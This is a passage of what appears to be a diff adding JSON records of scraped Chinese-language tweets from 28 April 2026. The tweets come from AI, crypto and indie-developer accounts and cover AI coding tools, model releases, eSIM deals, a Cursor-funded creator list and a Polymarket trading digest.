Skills,如果我能用一个 Skills 解决那为什么要用你的产品?", + "url": "https://x.com/gkxspace/status/2049136483106230523", + "published_at": "2026-04-28T14:39:43+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "升级了自己的 AI 视频管线把这个文字内容重做成 46 秒竖屏视频版。\n\n全自动化 pipeline 操作的。大家觉得怎么样👀\n\n之前开源的 claude-video-kit 详情见 https://x.com/runes_leo/status/2041395548234944600", + "url": "https://x.com/runes_leo/status/2049133521919484102", + "published_at": "2026-04-28T14:27:57+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "你们的ChatGPT都是什么样子?\n\n提示词如下:\n\nChatGPT,你陪我一段时间了,我想看看你的样子。请生成一张类似你自己用iPhone随手自拍的照片:没有明确主题、没有刻意构图,只是很普通、甚至有点失败的快照。照片略带运动模糊,光线不均、轻微曝光过度,角度尴尬,构图混乱,整体呈现出一种\"过于真实的随手一拍感”,就像是从口袋里拿出手机不小心按到的自拍\n\nlinuxdo刷到的", + "url": "https://x.com/Pluvio9yte/status/2049128229760561602", + "published_at": "2026-04-28T14:06:55+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "50000🎉🎉", + "url": "https://x.com/CuiMao/status/2049128032661852434", + "published_at": "2026-04-28T14:06:08+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "CMLink英国卡老用户可在【无忧行英国版JegoTrip-CMLink】领20G本地流量包\n另外CMLink UK下架eSIM,要求补卡要激活一个月才能补,估计是防止国内用户下单抢名额", + "url": "https://x.com/realNyarime/status/2049127378815942981", + "published_at": "2026-04-28T14:03:32+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "如果你的claude里面要接deepseek v4 pro,effort一定要拉到max才有效果。官方文档里说的。也挺好,反正这几天四舍五入等于不要钱。", + "url": "https://x.com/CuiMao/status/2049127261409034535", + "published_at": "2026-04-28T14:03:04+00:00", + "source": "nitter" + }, + { + "handle": "frxiaobei", + "account": "@frxiaobei", + "name": "凡人小北", + "title": "图像类产品现在分两派:\n把单次生成做到极致,和把整个视觉工作流跑通。\n\nflowith 明显是后者,还顺手把视频给 seedance 出来了。\n\n关键是底层就是 image2,而且不止这一个模型。\n\n不管底层怎么换,上层工作流都很稳。\n单点极致 + 工作流闭环,两派合一。\n\n对我这种普通用户非常有价值。", + "url": "https://x.com/frxiaobei/status/2049121762009632774", + "published_at": "2026-04-28T13:41:13+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "R to @CuiMao: 支持json格式的日志导出!很重要", + "url": "https://x.com/CuiMao/status/2049120290949702063", + "published_at": "2026-04-28T13:35:22+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "Flowith出 GPT image 的生图Agent,真快呀\n\n我赶紧试试,看看如何!!", + "url": "https://x.com/lxfater/status/2049119209502670864", + "published_at": "2026-04-28T13:31:04+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "因为要做benchmark,所以用claude做了个win原生的显卡监控,市面上的都过度设计给游戏用的花里胡哨。这个版本算跑起来了,下个一版本支持本地多卡监控。", + "url": "https://x.com/CuiMao/status/2049118822070997394", + "published_at": "2026-04-28T13:29:32+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "Test of Time LLM from some legends...pretty fun!", + "url": "https://x.com/soumithchintala/status/2049117783447785523", + "published_at": "2026-04-28T13:25:24+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "账号代运营这个事,我只在微信聊天里说过\n\n且没有外传\n\n为什么豆包能知道?微信南山必胜客,可以查查哈", + "url": "https://x.com/GoSailGlobal/status/2049112739696513306", + "published_at": "2026-04-28T13:05:22+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "When I was 22 I was offered £18M (all cash) for 20VC media company. \n\nWith any tough decision, I went for a walk with my mother, she asked me one question: \n\n“What would you do tomorrow if you did sell the company today?” \n\nWithout a seconds thought I responded: \n\n“I would start The Nineteen Minute VC and use that as leverage to win in investing. \n\nWhen the alternative to selling is doing what you would already do, never sell. \n\nBet on yourself. Go long. \n\nIt was the single best decision I ever made. \n\nThanks Mama!", + "url": "https://x.com/HarryStebbings/status/2049112007475855369", + "published_at": "2026-04-28T13:02:27+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "RT by @GoSailGlobal: x.com/i/article/204910523511…", + "url": "https://x.com/GoSailGlobal/status/2049109953668149643", + "published_at": "2026-04-28T12:54:18+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "⚠️ Google’s Pentagon deal seems to allow for autonomous weapons and mass surveillance. ⚠️", + "url": "https://x.com/GaryMarcus/status/2049104294415409347", + "published_at": "2026-04-28T12:31:48+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "恭喜你们有职业定位了:AI 包工头\n\nAgent Operator,未来 5 年每家公司都会需要的新岗位?说人话就是 AI 包工头——专门编排 AI agent 干活,核心 5 项技能:MCP / CLI / skills.md / AGENTS.md / 业务嗅觉。\n\n但这不是新职业,是没起名字而已😆\n\n翻了下自己这半年攒的工作流,他列的每一条都对得上号。中文圈靠 Claude Code 自己搭流程的人也很多的,只是没人专门起这么一个 title。\n\n想跟上不用等 5 年,今晚把最高频的工作流写成一个 skill 试试就开始了。👀", + "url": "https://x.com/runes_leo/status/2049102248719052964", + "published_at": "2026-04-28T12:23:41+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Media Math…\nMore Negative/Sensationalist = More Viewers = Higher Prices for Advertising = Larger Profits = Happier Shareholders\nNowhere in the formula will you find educating, informing and empowering people.", + "url": "https://x.com/charliebilello/status/2049101573477806428", + "published_at": "2026-04-28T12:21:00+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "麻烦下次这种表单不要at我,我就是个傻逼,我不配。谢谢。", + "url": "https://x.com/CuiMao/status/2049099295337709885", + "published_at": "2026-04-28T12:11:57+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "R to @GoSailGlobal: 我跟前同事说了下我的业务,然后他去问了下豆包", + "url": "https://x.com/GoSailGlobal/status/2049098535459553712", + "published_at": "2026-04-28T12:08:55+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "兄弟们,我真没做豆包GEO\n\n你把我收入都曝光了\n\n还曝光了我名字,给我增加了一些没有的业务🤣", + "url": "https://x.com/GoSailGlobal/status/2049098393448812767", + "published_at": "2026-04-28T12:08:22+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "之前买过 ZenMux 速度还是挺快的, 算是 OpenRouter alternative 吧。咱也不是很懂,感觉既然能上 OpenCode 的第三方列表,说明还是比较正规和靠谱的吧?\n\n目前 DeepSeek V4 限时免费体验:https://zenmux.ai/invite/RUR17S", + "url": "https://x.com/dingyi/status/2049096050158551248", + "published_at": "2026-04-28T11:59:03+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "A venture firm saying we should have a podcast is like when they say they think AI is going to be big.", + "url": "https://x.com/HarryStebbings/status/2049095586335343034", + "published_at": "2026-04-28T11:57:12+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "这个 Codex 教程很不错,新手值得一看。\n\n作者一个人演示并行推进 6 个项目:iOS App、React 落地页、Remotion 视频、投资人 Deck、移动端设计稿、Twitter 自动发帖。\n\n5 个有用的技巧:\n\n①Codex 是一个 AI 代理调度中心:编码、文档、浏览器、计算机控制全在一个界面里。你可以同时给多个 AI 代理下指令。\n\n②插件是别人给你的能力,skills是你自己造的能力。遇到重复流程,用 /skill creator 让 AI 帮你封装成可复用技能。\n\n③自动化只需要一句话,如:\"把这个任务每周五下午4点跑一次\"。日历周报、YouTube 数据分析、Twitter 发帖,全部自动。\n\n④Codex 的设计能力是短板。解法是在 Codex 终端里直接跑 Claude Code,让它处理视觉密集型任务。Codex 调度,Claude 出活,各取所长。\n\n⑤Steer 功能让你在 AI 工作途中实时注入修正指令,不用等它跑完再改。Fork 功能让你从一个已有大量上下文的聊天分叉出新任务,不用重复描述背景。\n\n⑥从 Anthropic 的 http://claude.ai/design 里提取设计工具的工作逻辑,直接移植到 Codex 变成自己的技能。跨平台能力迁移。\n\nhttps://x.com/Saccc_c/status/2048629684792098966/video/1", + "url": "https://x.com/gkxspace/status/2049083226463797284", + "published_at": "2026-04-28T11:08:05+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "R to @berryxia: Hugging Face: https://huggingface.co/collections/sensenova/sensenova-u1\n\n在线体验与接入:\nSenseNova官网:https://sensenova.sensetime.com/", + "url": "https://x.com/berryxia/status/2049073897660953075", + "published_at": "2026-04-28T10:31:01+00:00", + "source": "nitter" + }, + { + "handle": "berryxia", + "account": "@berryxia", + "name": "Berryxia", + "title": "🔥兄弟们,最近多模态图像模型真是神仙打架啊!\n看来又要来一波,实测对比了啊!\n前几天才发完测试,又有新的模型,真心吃不消啊!\n\n又发现一个全网开源、即刻可用的重磅神器 —— 商汤 OpenSenseNova 刚刚发布 SenseNova-U1!\n\n原生统一多模态大模型,NEO-Unify架构,视觉+语言从第一性原理彻底打通,无独立VE/VAE!\n\n核心技术亮点:\n• 文本与图像深度交错生成(教程、海报、漫画一气呵成)\n• 推理驱动的智能图像编辑(懂物理逻辑)\n• 高密度信息图表渲染超强\n\n模型大小高度本地化:\n• 8B 密集模型\n• A3B-MoT(活性参数仅约3B,个人显卡就能本地部署跑起来!)\n\n全网开源部署,Apache 2.0 可商用:\nGitHub: https://github.com/OpenSenseNova/SenseNova-U1\n\n立刻登录领取限时免费Token Plan额度,每天5小时 + 1500次无门槛调用,零成本解锁极速体验!\n\n即将上线「办公小浣熊」,这个结合办公看看能不能搞点东西出来!\n\n本地多模态时代,冲就对了!", + "url": "https://x.com/berryxia/status/2049073892829036759", + "published_at": "2026-04-28T10:31:00+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "😅😅玩游戏顶着 CuiMao 的 ID 被队友认出来了。", + "url": "https://x.com/CuiMao/status/2049073837543940468", + "published_at": "2026-04-28T10:30:47+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "我的 mac 的工作区,这几个都是必不可缺,看来大家差不多,还有没安装的快装一下:\n\n1. Obsidian:用来做内容存档、搭建个人知识库\n2. cc-swtich:管理多个 CLI 工具,管理多家模型供应商\n3. Codex :最近更新很频繁,体验也越来越好,而且不封号\n4. Ghostty:一个非常丝滑的终端,推荐~\n5. 闪电说 + Typless:前者非结构化,后者结构化,配合使用很爽\n6. V2rayN:更加必不可少了,大家都懂", + "url": "https://x.com/gkxspace/status/2049072666385006919", + "published_at": "2026-04-28T10:26:08+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "央视报道了 “渔猎齐哥” Up主,真牛逼啊。\n监督环境保护,吾辈义不容辞!", + "url": "https://x.com/0xAA_Science/status/2049072268165497033", + "published_at": "2026-04-28T10:24:33+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "Xiaomi MiMo V2.5包含旗舰推理模型、多模态模型和语音合成模型,MiMo API 开放平台面向全球用户提供 API 推理服务,可直接对接Claude Code、Cursor、OpenClaw等主流编程工具\n还是有点期待的,如果有OpenClaw需求的同学们可以考虑提交自己的GitHub或项目官网+100字以上小作文申请\n\n北京时间2026年4月28日至5月28日,共 30 天,赠完即止。面向全球所有用户开放,个人开发者、团队、企业均可参与\nhttps://100t.xiaomimimo.com/", + "url": "https://x.com/realNyarime/status/2049070878961656082", + "published_at": "2026-04-28T10:19:02+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "从 Claude 转向 Codex 的越来越多了\n我也有同感\n没 100% 切到 Codex 是因为我还在双轨用:\nCC 写日常对话+内容/工具代码+工作流编排,Codex 做策略/数据代码+独立 review+verify。\n两边各有强项,先一起用着看看👀", + "url": "https://x.com/runes_leo/status/2049070650481066377", + "published_at": "2026-04-28T10:18:07+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "来盛大逛了逛 \n\n见了推友艾略特@elliotchen100 @evermind \n\n原来他们集团旗下,好多个AI Native团队\n\n拿了一波周边👀", + "url": "https://x.com/GoSailGlobal/status/2049061850621296924", + "published_at": "2026-04-28T09:43:09+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "是谁污染了icu后缀域名???", + "url": "https://x.com/realNyarime/status/2049059109258010927", + "published_at": "2026-04-28T09:32:15+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "本来要明天才能刷新的 codex 额度,突然又被提前重置了一轮\n\nCodex 这点真有意思呀\n\n周额度按理说 7 天一刷新,实际上隔几天就偷偷给你重置一次。\n\n这到底是营销策略还是什么骚操作", + "url": "https://x.com/runes_leo/status/2049055175906931184", + "published_at": "2026-04-28T09:16:38+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "中国移动CMLink UK(小移在英国)发布官方App【JegoTrip-CMLink】\n由JegoTrip无忧行团队负责开发,仅提供用量、话费查询,不过也可以领免费eSIM\n1)5月31日之前,下载并登录App可获得20GB英国本地流量,7个工作日内到账有效期28天\n2)新用户可领取eSIM一张,此卡可在中国香港、英国及欧盟进行激活,或使用英国IP代理下拉起WiFi通话(VoWiFi)激活号卡\n\n激活后可办理中英月套餐,每月16.8英镑(约人民币168元)享受150GB两地流量。虽然CMLink的120天公平使用原则永远不会生效,但仍需注意在套餐取消、过期后30天应办理有效套餐,最便宜的12英镑保号套餐可维持一年,否则号卡将在一个月后失效无法找回", + "url": "https://x.com/realNyarime/status/2049053713642471580", + "published_at": "2026-04-28T09:10:49+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "国内银行大概是永远也不会有这种工具了。\n\nhttps://rayfinance.app/", + "url": "https://x.com/dingyi/status/2049051261295878623", + "published_at": "2026-04-28T09:01:04+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "Pinned: 04年女大,在美国。元气少女,活力满满,Web3菜鸟,希望多向各位大佬学习。", + "url": "https://x.com/chuxiaeth/status/2049048148660965739", + "published_at": "2026-04-28T08:48:42+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "其实我最遗憾的是,帝国时代Online为什么下掉了,最怀念的是AOE2那会跟同学拿着U盘拷副本,然后在电脑课教室的局域网里面联机,回家后还用浩方周末组队\n记得我最喜欢的是拜占庭,我的发小会选哥特跟我联盟,至于其他小伙伴就是按照他们的习惯选择。不过后面就都各奔东西,唯独我的世界、幻兽帕鲁这类的联机游戏又齐聚一堂\n\n如果可以的话,还是希望这辈子能看到微软把帝国时代Online给重新上架,总感觉后来重制版、Steam联机这些都不是很好玩,反而觉得最老的DX9是最舒服的(可能就是活在那个年代的人", + "url": "https://x.com/realNyarime/status/2049047146146754812", + "published_at": "2026-04-28T08:44:43+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "开始上 >@TermMaxFi 了,是不是有些晚了,按照网上的教程,每天来签到,再写一篇推特的帖子,拿MP空投积分。\n#TermMax 是 DeFi 固定利率借贷与循环借贷策略类的项目。预计今年Q2发币。", + "url": "https://x.com/chuxiaeth/status/2049045566857064461", + "published_at": "2026-04-28T08:38:27+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "R to @chuxiaeth: 比特币橙子哥的推是 @oragnes 原推有误", + "url": "https://x.com/chuxiaeth/status/2049043685094907944", + "published_at": "2026-04-28T08:30:58+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: 《Cursor 官方扶持的 AI & Web3 创作者名录》\n\n@cursor_ai 作为顶尖的 AI 项目,最近筛选了 15 位中文区优质博主,给予了价值一万美元的 Token 激励。如果深入了解这个圈子的行情,就会知道这份名单的分量确实不低。\n\n以下是这 15 位获得资助的创作者及其核心画像(顺序随机):\n\n1. Jason Zhu @GoSailGlobal 独立开发者,主要分享 SaaS 出海经验与 AI 资讯,并搭建了一个聚合各类 Agent 技能的资源站点。\n\n2. 0xAA @0xAA_Science 毕业于北大计算机系,博士学历,同时也是 Web3 开源教育平台 WTF Academy 的发起人。\n\n3. 泊舟 @bozhou_ai 拥有 2.1 万粉丝的 AI 博主,既是 AI 程序员也是氛围编程的践行者,重点构建各类智能体与提示词方案。\n\n初夏 @chuxiaeth 这里斗胆把我也加入,一个努力学习AI的小卡拉米。\n\n4. Ding @dingyi 产品设计师出身,掌管着 SaasPick、TopFeed 等多个独立产品,全网积累了约 15 万的关注者。\n\n5. 雪踏乌云 @Pluvio9yte 供职于大厂的开发者,主要输出氛围编程、AI 编程技巧以及产品出海方面的实操经验。\n\n6. 奶昔 @realNyarime Naixi Networks 的创办者,核心精力聚焦在 eSIM 技术与奶昔社区的运营上。\n\n7. 杀破狼 @wolfyxbt 深耕 Meme 币赛道,热衷于氛围编程与链上数据拆解,表达方式风趣且一针见血。\n\n8. 凡人小北 @frxiaobei 身兼商业与战略顾问,致力于 AI 战略咨询,长期扎根在真实商业场景中推动 AIGC 项目的落地应用。\n\n9. Leo @runes_leo AI 与 Crypto 的独立建设者,符文堂社区的发起人,深入钻研比特币生态体系与链上量化策略。\n\n10. 铁锤人 @lxfater AI 领域博主,善于借助 AI 赋能创业历程,在 GitHub 上维护着一个斩获 3 万星标的热门项目。\n\n11. 比特币橙子 @oranges 资深比特币玩家与加密投资人,对 AI 和氛围编程抱有极高热情,亲手搭建了集成多种 AI 智能体的工具集 OwlClawHub。\n\n12. Steven Lynn @Stv_Lynn 既是科技播客 FirstLabAI 的主持人,也是线下活动 Crazy Saturday 的发起与主办者。\n\n13. Berryxia @berryxia 热衷于打造各类 AI 工具并精研系统级提示词,对设计美学与提示词分享抱有极大热忱。\n\n14. 余温 @gkxspace 05 年出生的连续创业者,年纪虽轻但经验丰富,专注于 AI 产品从 0 到 1 的商业化打造,已有项目营收突破七位数。\n\n15. CuiMao @CuiMao 偏重开发实战的 AI 博主,专研深度学习、NVIDIA 生态与 ComfyUI 工作流,并运营着免费的技术学习社群。\n\n这批博主横跨了 AI 编程、比特币生态、SaaS 出海以及深度技术钻研等多个细分赛道,关注他们,往往能捕获到行业最前线的风向。", + "url": "https://x.com/bozhou_ai/status/2049042369530777747", + "published_at": "2026-04-28T08:25:44+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "RT by @Pluvio9yte: 《Cursor 官方扶持的 AI & Web3 创作者名录》\n\n@cursor_ai 作为顶尖的 AI 项目,最近筛选了 15 位中文区优质博主,给予了价值一万美元的 Token 激励。如果深入了解这个圈子的行情,就会知道这份名单的分量确实不低。\n\n以下是这 15 位获得资助的创作者及其核心画像(顺序随机):\n\n1. Jason Zhu @GoSailGlobal 独立开发者,主要分享 SaaS 出海经验与 AI 资讯,并搭建了一个聚合各类 Agent 技能的资源站点。\n\n2. 0xAA @0xAA_Science 毕业于北大计算机系,博士学历,同时也是 Web3 开源教育平台 WTF Academy 的发起人。\n\n3. 泊舟 @bozhou_ai 拥有 2.1 万粉丝的 AI 博主,既是 AI 程序员也是氛围编程的践行者,重点构建各类智能体与提示词方案。\n\n初夏 @chuxiaeth 这里斗胆把我也加入,一个努力学习AI的小卡拉米。\n\n4. Ding @dingyi 产品设计师出身,掌管着 SaasPick、TopFeed 等多个独立产品,全网积累了约 15 万的关注者。\n\n5. 雪踏乌云 @Pluvio9yte 供职于大厂的开发者,主要输出氛围编程、AI 编程技巧以及产品出海方面的实操经验。\n\n6. 奶昔 @realNyarime Naixi Networks 的创办者,核心精力聚焦在 eSIM 技术与奶昔社区的运营上。\n\n7. 杀破狼 @wolfyxbt 深耕 Meme 币赛道,热衷于氛围编程与链上数据拆解,表达方式风趣且一针见血。\n\n8. 凡人小北 @frxiaobei 身兼商业与战略顾问,致力于 AI 战略咨询,长期扎根在真实商业场景中推动 AIGC 项目的落地应用。\n\n9. Leo @runes_leo AI 与 Crypto 的独立建设者,符文堂社区的发起人,深入钻研比特币生态体系与链上量化策略。\n\n10. 铁锤人 @lxfater AI 领域博主,善于借助 AI 赋能创业历程,在 GitHub 上维护着一个斩获 3 万星标的热门项目。\n\n11. 比特币橙子 @oranges 资深比特币玩家与加密投资人,对 AI 和氛围编程抱有极高热情,亲手搭建了集成多种 AI 智能体的工具集 OwlClawHub。\n\n12. Steven Lynn @Stv_Lynn 既是科技播客 FirstLabAI 的主持人,也是线下活动 Crazy Saturday 的发起与主办者。\n\n13. Berryxia @berryxia 热衷于打造各类 AI 工具并精研系统级提示词,对设计美学与提示词分享抱有极大热忱。\n\n14. 余温 @gkxspace 05 年出生的连续创业者,年纪虽轻但经验丰富,专注于 AI 产品从 0 到 1 的商业化打造,已有项目营收突破七位数。\n\n15. CuiMao @CuiMao 偏重开发实战的 AI 博主,专研深度学习、NVIDIA 生态与 ComfyUI 工作流,并运营着免费的技术学习社群。\n\n这批博主横跨了 AI 编程、比特币生态、SaaS 出海以及深度技术钻研等多个细分赛道,关注他们,往往能捕获到行业最前线的风向。", + "url": "https://x.com/Pluvio9yte/status/2049042369530777747", + "published_at": "2026-04-28T08:25:44+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "《Cursor 官方扶持的 AI & Web3 创作者名录》\n\n@cursor_ai 作为顶尖的 AI 项目,最近筛选了 15 位中文区优质博主,给予了价值一万美元的 Token 激励。如果深入了解这个圈子的行情,就会知道这份名单的分量确实不低。\n\n以下是这 15 位获得资助的创作者及其核心画像(顺序随机):\n\n1. Jason Zhu @GoSailGlobal 独立开发者,主要分享 SaaS 出海经验与 AI 资讯,并搭建了一个聚合各类 Agent 技能的资源站点。\n\n2. 0xAA @0xAA_Science 毕业于北大计算机系,博士学历,同时也是 Web3 开源教育平台 WTF Academy 的发起人。\n\n3. 泊舟 @bozhou_ai 拥有 2.1 万粉丝的 AI 博主,既是 AI 程序员也是氛围编程的践行者,重点构建各类智能体与提示词方案。\n\n初夏 @chuxiaeth 这里斗胆把我也加入,一个努力学习AI的小卡拉米。\n\n4. Ding @dingyi 产品设计师出身,掌管着 SaasPick、TopFeed 等多个独立产品,全网积累了约 15 万的关注者。\n\n5. 雪踏乌云 @Pluvio9yte 供职于大厂的开发者,主要输出氛围编程、AI 编程技巧以及产品出海方面的实操经验。\n\n6. 奶昔 @realNyarime Naixi Networks 的创办者,核心精力聚焦在 eSIM 技术与奶昔社区的运营上。\n\n7. 杀破狼 @wolfyxbt 深耕 Meme 币赛道,热衷于氛围编程与链上数据拆解,表达方式风趣且一针见血。\n\n8. 凡人小北 @frxiaobei 身兼商业与战略顾问,致力于 AI 战略咨询,长期扎根在真实商业场景中推动 AIGC 项目的落地应用。\n\n9. Leo @runes_leo AI 与 Crypto 的独立建设者,符文堂社区的发起人,深入钻研比特币生态体系与链上量化策略。\n\n10. 铁锤人 @lxfater AI 领域博主,善于借助 AI 赋能创业历程,在 GitHub 上维护着一个斩获 3 万星标的热门项目。\n\n11. 比特币橙子 @oranges 资深比特币玩家与加密投资人,对 AI 和氛围编程抱有极高热情,亲手搭建了集成多种 AI 智能体的工具集 OwlClawHub。\n\n12. Steven Lynn @Stv_Lynn 既是科技播客 FirstLabAI 的主持人,也是线下活动 Crazy Saturday 的发起与主办者。\n\n13. Berryxia @berryxia 热衷于打造各类 AI 工具并精研系统级提示词,对设计美学与提示词分享抱有极大热忱。\n\n14. 余温 @gkxspace 05 年出生的连续创业者,年纪虽轻但经验丰富,专注于 AI 产品从 0 到 1 的商业化打造,已有项目营收突破七位数。\n\n15. CuiMao @CuiMao 偏重开发实战的 AI 博主,专研深度学习、NVIDIA 生态与 ComfyUI 工作流,并运营着免费的技术学习社群。\n\n这批博主横跨了 AI 编程、比特币生态、SaaS 出海以及深度技术钻研等多个细分赛道,关注他们,往往能捕获到行业最前线的风向。", + "url": "https://x.com/chuxiaeth/status/2049042369530777747", + "published_at": "2026-04-28T08:25:44+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "五一节快到了,听说N卡上网最快了", + "url": "https://x.com/realNyarime/status/2049040750860812765", + "published_at": "2026-04-28T08:19:18+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "Leo Labs 大群 4-28 群友讨论精华(最近 584 条)\n\nV2 cutover 5 小时后正式生效,群里这一天聊到的 4 件事记下来。\n\n━━━━━━━━━━━━\n\n1️⃣ V2 EOA 已实测可跑,但 redeem 路径有坑\n\n• 4/27 上午有人 EOA 实盘 4h ≈ $20(V2 endpoint 已下单成功)\n• redeem 回来是 USDC.e,不是 pUSD,要交易得再 warp 一次\n• Gnosis Safe / 邮箱注册号 当前都没支持,等官方上线\n• pUSD 4/28 早晨试下单\"无对手盘 / 无 orderbook\",正式 19:00 后才完整上线\n\n💡 EOA 已可上车,其他钱包等今晚\n\n━━━━━━━━━━━━\n\n2️⃣ cutover 前夜事故潮(4/28 早晨集中爆发)\n\n• 多人 bot 全停:\"亏损次数和程度都远超正常值\"\n• 异常价格:进场 68¢ 瞬间砸到 6¢ 又恢复 68¢\n• clob 撮合常给 2-3 秒才成交(撤单攻击窗口)\n• 群友共识:\"今天升级前后市场必然很乱,先停下来等等看\"\n• 反共识:\"越乱越赚钱,乱就停就一辈子亏钱\"\n\n💡 时间换数据 vs 数据换时间,你站哪边\n\n━━━━━━━━━━━━\n\n3️⃣ V2 后加密手续费 ≈ 业内最高\n\n群里跨平台费率扒了一遍:\n• Binance 合约:万分之一(含 BNB 折扣到万分之几)\n• Deribit 短期期权:万三 → 等效 1% 购买金额\n• 正规博彩奖池:95%+\n• PM V2 加密:高频 maker/taker 都没法承受新费率\n\n群里多数派:\"机器人集体退出加密板块,体育板块手续费低 + 不卡资金 + 全球年赌球资金万亿规模\"\n\n💡 V2 后加密 alpha 可能搬家了\n\n━━━━━━━━━━━━\n\n4️⃣ $1M 流动性奖励规则(前 2h $500K)\n\n• 入口:PM 网页 → 头像 → rewards\n• 规则:在指定市场 range 内挂 limit order 就有奖励,yes no 都挂,没成交也有\n• 量级测算:PM 日均 2.5 亿成交,1h ≈ 2000 万,$500K ≈ 2-2.5%\n• 风险:撤单不及时仍会被逆向\n\n💡 前 2h 黄金 slot 比当日剩余时段高密度 2x\n\n━━━━━━━━━━━━\n\n📌 今日 3 个值得记下来的点\n\n1. EOA V2 已通,但 USDC.e ↔ pUSD 来回 warp 是新成本项\n2. V2 加密手续费 ≈ 行业最高,体育板块成 alpha 主战场候选\n3. $1M 池前 2h 是黄金 slot — 测算占 PM 日成交 2-2.5%\n\n---\n\n每天我会把 Leo Labs 大群的群友讨论精华整理成日报,发在频道里。\n\n💬 大群 http://t.me/runesgang\n📡 每日精华频道 http://t.me/runesgangalpha\n🔗 想自己扒数据研究地址 → http://polymarket.com/?r=tgpublic&via=runes-leo&utm_source=x&utm_content=group-digest-4-28&v…", + "url": "https://x.com/runes_leo/status/2049039917494231397", + "published_at": "2026-04-28T08:16:00+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "memos确实是在记忆里面做的很不错的,自己做的Agent也可以接入一下他们的", + "url": "https://x.com/bozhou_ai/status/2049033808629129504", + "published_at": "2026-04-28T07:51:43+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "听我一句劝,不要接触 .NET。\n不要什么都想学,不要觉得 AI 牛逼了,自己就也牛逼起来了。\n有些技术不是用来学习的,是用来渡劫的。\n不要接触 .NET,人生会变得不幸。", + "url": "https://x.com/CuiMao/status/2049032868610072772", + "published_at": "2026-04-28T07:47:59+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "昨天试了下快乐🐎,早上起来一看欠费了, 